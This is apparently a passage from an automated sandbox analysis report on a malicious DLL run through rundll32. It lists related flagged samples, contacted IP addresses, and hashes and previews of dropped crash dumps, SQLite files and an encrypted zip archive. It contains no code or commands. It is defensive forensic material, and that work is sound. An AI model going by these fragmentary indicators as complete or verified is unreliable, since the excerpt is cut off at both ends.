                                                                                                                                    • 172.65.251.78
                                                                                                                                    • 104.26.12.205
                                                                                                                                    • 104.26.13.205
                                                                                                                                    rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.65.251.78
                                                                                                                                    • 104.26.12.205
                                                                                                                                    • 104.26.13.205
                                                                                                                                    DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.65.251.78
                                                                                                                                    • 104.26.12.205
                                                                                                                                    • 104.26.13.205
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    C:\Windows\System32\e_sqlite3.dllVRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  rBFTGm5ioO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    nNnzvybxiy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):65536
                                                                                                                                                      Entropy (8bit):0.8222407288385005
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:kUMFhpizyKy6sj44RvbCu/6tQXIDcQJc6Qk00cEncw3eXaXz+HbHgSQgJjfo8FxD:qdizy6m033tgjdQzuiF0Z24lO8ZT
                                                                                                                                                      MD5:7BC220BADED25D2A4EEF2A8C382E17B5
                                                                                                                                                      SHA1:CA80DFB967B6844DA4C18B5D91753A5E46DE75C7
                                                                                                                                                      SHA-256:CA3441D6F8FE749D8813A41C2A82774D1CB7023D8828F6CD22349E6E40488FA1
                                                                                                                                                      SHA-512:48635D2BE6148BF8AD12B6652F016CE9644A2D445DAE95EBB75C768E9E4F3A0E5BF129177DC7FE2B9D3639AEB31038C9CDF938E51A8CF80832E1693903FAFD43
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.3.1.0.5.6.7.8.0.1.4.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.3.1.0.5.7.0.9.2.6.5.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.3.2.e.2.5.4.-.6.1.2.7.-.4.c.b.2.-.a.4.b.7.-.c.f.1.8.9.3.a.e.9.c.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.b.f.e.a.6.2.-.7.2.6.2.-.4.a.2.d.-.8.c.b.f.-.e.f.1.8.e.f.d.9.1.5.f.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.m.P.8.r.z.G.D.7.f.G...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.2.0.-.0.0.0.1.-.0.0.1.4.-.0.6.e.2.-.6.e.3.a.7.f.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):65536
                                                                                                                                                      Entropy (8bit):0.822189319954195
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:A6FdddJpiByKyfsj44RvbCu/6tQXIDcQJc6Qk00cEncw3eXaXz+HbHgSQgJjfo8f:TdViByfm033tgjtQzuiF0Z24lO8ZT
                                                                                                                                                      MD5:0345C008DF940B012ED7B27D254BF2D7
                                                                                                                                                      SHA1:7A237EF9F6357B076D1DEE93CD9B9668BDF88689
                                                                                                                                                      SHA-256:51CC4C8463CB09DF9C05BAA1CB15D732242181380B87ABA09B576BA5DD4ED81B
                                                                                                                                                      SHA-512:D8479476193B3B2C5D2AC03C31EE309A57CEC0CFE7B01E69F859F07FE71877B446666324D87056B0C7AA0310F0D863CAD4E79C6F375C8305907D0863C28B98DC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.3.1.0.5.9.7.0.3.9.0.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.3.1.0.6.0.0.0.0.7.7.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.2.d.a.7.3.c.-.8.1.6.2.-.4.4.8.d.-.8.6.0.7.-.d.b.c.6.a.a.c.8.c.4.8.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.a.1.7.7.7.c.-.2.b.6.a.-.4.d.7.5.-.8.8.f.9.-.3.e.6.6.a.2.c.8.1.b.3.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.m.P.8.r.z.G.D.7.f.G...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.6.0.-.0.0.0.1.-.0.0.1.4.-.5.1.f.4.-.3.c.3.c.7.f.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Tue Jan 14 12:24:19 2025, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):59190
                                                                                                                                                      Entropy (8bit):1.637497454036716
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:5W8or9MMtelUZAP0FX9UV1q0hAbHgkZC7oi7MTPXq53e9d0q+IN33nCaJbqi4RGZ:boIslSlhvACsOMTS0DnCawZG2AouRL
                                                                                                                                                      MD5:2274F970C460A3A5A3E08FA281539F95
                                                                                                                                                      SHA1:06649533B8CF740BE05A0A45FA681F9FF05923FB
                                                                                                                                                      SHA-256:F3887821A2CD1E69A359678B653EAF523217A84681A19F7C5B9E239C5DE01A9D
                                                                                                                                                      SHA-512:E7417C9D5117DFCFE990C0815F532519EE2CE6711A429E4D7AB7DE6DA0C7864FB9CBBCCCF907FD545593F5A6A91FF20C8C7FCFDDE57723A74A8578BADA7A2208
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... .......sW.g........................................R-..........T.......8...........T...........................H...........4...............................................................................eJ..............Lw......................T.......`...sW.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8608
                                                                                                                                                      Entropy (8bit):3.6993464442896777
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJ5teq6Yrk8nlgmfBEQpr089bmZUfqlim:R6lXJTj6YoEgmfBEUmqf4
                                                                                                                                                      MD5:A1AD1BB66D26FD8B50DFEA46C0F2236A
                                                                                                                                                      SHA1:E7FA51FA136096E9D4B2C2A98E2955F6EAA5940C
                                                                                                                                                      SHA-256:071A1D9F08D7F54507C662F4496040A2FB59D6C793AFA9B7FEBB4D67159503CC
                                                                                                                                                      SHA-512:48467BCF91BA2EAF49C7AA1042A1726D0E1C8D9D109DF4DFAB54152393427BEC7DA749291EB8E87520B3530DCC905CF18798B22B7EDF0539F536A92268DE2CDC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.7.2.<./.P.i.
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4872
                                                                                                                                                      Entropy (8bit):4.487819573829181
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zsMJg771I992RNWpW8VY/Ym8M4JCVC9/FKyyq8vh9EIptSTSgd:uIjfKI7Lq7V7JSyWhpoOgd
                                                                                                                                                      MD5:5C4554F68A2ACD09619DF5AFBBD56AA6
                                                                                                                                                      SHA1:1121F9AB5480D388894D016549E327DAFA20DB80
                                                                                                                                                      SHA-256:5834685E9F491660F6A6F84BB1166FA79370DAEC7EB69CD6371C26DBC9132323
                                                                                                                                                      SHA-512:93AF7B36CA7315C9CB678CAACFA8C05A793731CC45E4D2D7269F36D6346585539B69F2A27FB2C9B8C501AD76EFCF7C3EC970843EB2896CA8E50A44B66DE93B5A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675567" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Tue Jan 14 12:24:16 2025, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):56966
                                                                                                                                                      Entropy (8bit):1.6959860448724298
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:IoSslhcFhlydVOMTibqWMPIMwfH6iTL2Ij:csjcnlW4uibPMPINH6oL20
                                                                                                                                                      MD5:7BB1EB9AACA953154F1B5C7F1211248F
                                                                                                                                                      SHA1:1DE3BADE23D54DF533E688DC3E2A3607087EE1F9
                                                                                                                                                      SHA-256:35134556CF70ED6A12769152902BEE58A2728FE94DE0A79EE912FC0EA46FA485
                                                                                                                                                      SHA-512:532D513849C10FF49967D4AE59E0C1A71EF75D11D68841AA50001DB66C3B66D1FA661A31811D8209F7B3407789D8F54C94492BCA138468BE955F2021611912F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... .......pW.g........................................R-..........T.......8...........T...........................H...........4...............................................................................eJ..............Lw......................T....... ...pW.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8598
                                                                                                                                                      Entropy (8bit):3.6997869603725833
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJUK66YrkdAgmfBEQprO89bRRtfQbm:R6lXJJ66YIKgmfBEyRLfh
                                                                                                                                                      MD5:52F430021979D917A7169F5B6CC8EC07
                                                                                                                                                      SHA1:D1901C1BF1D868EE2240E1ACF30DF46C2D4A6500
                                                                                                                                                      SHA-256:126E9AAAA5C4A9270C1CF00905332AB0922821FE2CE451CEE52CB2060D82A7A9
                                                                                                                                                      SHA-512:659480A84602127C2DAA6460C305D0D9A517F8A3B4D0B15A47A1C77D92E15A7A67A1F36CDD1D5B75D55DC221DD13058A2C53FF1678D5D715768FDA9DAAD3FDD2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.0.8.<./.P.i.
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4872
                                                                                                                                                      Entropy (8bit):4.485677571091546
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zsbJg771I992RNWpW8VYbYm8M4JCVC9/F3yq8vh9rnptSTSZd:uIjf1I7Lq7VzJvWvnpoOZd
                                                                                                                                                      MD5:BA2402AE00E36503470C9AD641A785BA
                                                                                                                                                      SHA1:F8D0FBD03282B7D2705621AB0CEAEAFA4CC23243
                                                                                                                                                      SHA-256:B49D9EF80C442C2161831B7AE8BF26BB9F0D0B9B3DD5F96667C063727CCB3DBF
                                                                                                                                                      SHA-512:4565AF9F71397496180FF80E823EEEF4C3AE5AA383BDA0AFDCD60B4AEDAF21FC71A97193582B55340654B5B070DC0AACC1D885793F4575304B3BAFB5DE8E6532
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675566" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):49152
                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):751624
                                                                                                                                                      Entropy (8bit):4.941596949315087
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                      MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                      SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                      SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                      SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):49152
                                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):751624
                                                                                                                                                      Entropy (8bit):4.941596949315087
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                      MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                      SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                      SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                      SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue
                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                      File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):95768
                                                                                                                                                      Entropy (8bit):7.9980005937062915
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:1536:76dC3U6doG5Nob5cIeuvicksiDytGK1k+r4SNwenvNYj0COhkzuv7rhoIJ/ii5Vl:7GF6SG5NOquvRtGUNHNvNYj0COhTXF3T
                                                                                                                                                      MD5:E35D03DF5CA9303618A07E7F4061EFAB
                                                                                                                                                      SHA1:554AA05DCA5EF690354133F46FCCA39DCB81258B
                                                                                                                                                      SHA-256:E4751FF0583B3134A9C01D4614D048DF2A639E0FCEAA642630E6989BDB83B4A9
                                                                                                                                                      SHA-512:5C895DA4C7A150DBD55D1041F198337AB75BA8768CE3A06D19020A7C578038CC37F6375E1A8359D46EE694C64D7FA7CC971542DE725F0544D0E37C86FFACBCA6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PK..-.....R;.Z.8n~............D/hwcompat.txt.....x......Zu.........d..j...\.....t....QN.x?...ZD.Ow.}...8.+....v......:.z.g%cf.1JF...r.&w....sXl.......@.`}Z...q.A.]L......*......1$N.....k...+.2..1UIe`..L~.r..&....@..d._.Z/I........y.W.T..w.Cs).O..E..#....s.B..$...A..fy.2..{uo.-............S....Y/...2.v...3j...#.....5Q.....F....tG", X"R&.No..5....q.....'.?I...........&{V.....=..t>.n.J*....-E1....x.E....8.'.......K.I;.>.Gq.cyOQ...Ex...u9?Qc.qy...P.].H.G,.N.....q.A.m.../H..|.klG^......nEp...)..AF(.d'.n.....Mtv.K.P8..l...f.].l..... ..o.p1.....,/.......*.G...~7.@v.X..3}.....X......"........I..OON.....ZE.....W.m..(.s....az.-3...L...@..s<.p....X.H...p.B?.G.....:G.7._C~:..0=......g$4r@.....CB..tH..3.;..Jtn..l.y.....t$.!C.Y.l4...uii.V.e...N....8.q1..8|R]....6....s.\...o|[....A.........e.c..............l......^+..1$..,..;:..x.Q..z...6t...2...*.c.N.[.CT..b.K.0.C.....z.".>Z+.?@........n..#..|...7...$..L.9......r.....IK.A.,O..j..zq^...|.Z.....g...
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):280
                                                                                                                                                      Entropy (8bit):0.7403664744478247
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:FiWXlv9U:Lv
